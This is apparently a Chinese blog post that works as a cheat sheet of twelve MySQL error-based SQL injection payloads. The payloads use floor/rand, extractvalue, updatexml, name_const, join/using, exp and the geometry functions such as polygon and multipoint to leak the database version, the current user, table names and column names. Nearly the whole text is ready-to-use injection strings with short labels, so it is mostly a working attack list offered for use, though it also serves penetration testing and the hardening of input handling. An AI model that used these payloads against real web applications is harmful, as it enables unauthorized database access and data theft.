1.通过floor报错
and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
2.通过ExtractValue报错
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
3.通过UpdateXml报错
and 1=(updatexml(1,concat(0x3a,(select user())),1))
4.通过NAME_CONST报错
and exists(select * from (select * from(select name_const(version(),0))a join (select name_const(version(),0))b)c);
5.通过join报错爆字段
注:该方法在知道表名的情况下使用
select * from (select * from 表名 a join 表名 b) c)
在得到一个字段后,使用using得到下一个字段
select * from (select * from 表名 a join 表名 b using (已知的字段,已知的字段)) c
6.通过exp报错
and exp(~(select * from (select user() ) a) );
注:由于MYSQL的版本问题,这种方法在我本地未重现成功,截图来自百度
7.通过GeometryCollection()报错
and geometrycollection((select * from(select * from(select user())a)b));
8.通过polygon()报错
and polygon((select * from(select * from(select user())a)b));
9.通过multipoint()报错
and multipoint((select * from(select * from(select user())a)b));
10.通过multlinestring()报错
and multilinestring((select * from(select * from(select user())a)b));
11.通过multpolygon()报错
and multipolygon((select * from(select * from(select user())a)b));
12.通过linestring()报错
and linestring((select * from(select * from(select user())a)b));
扫一扫
361
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
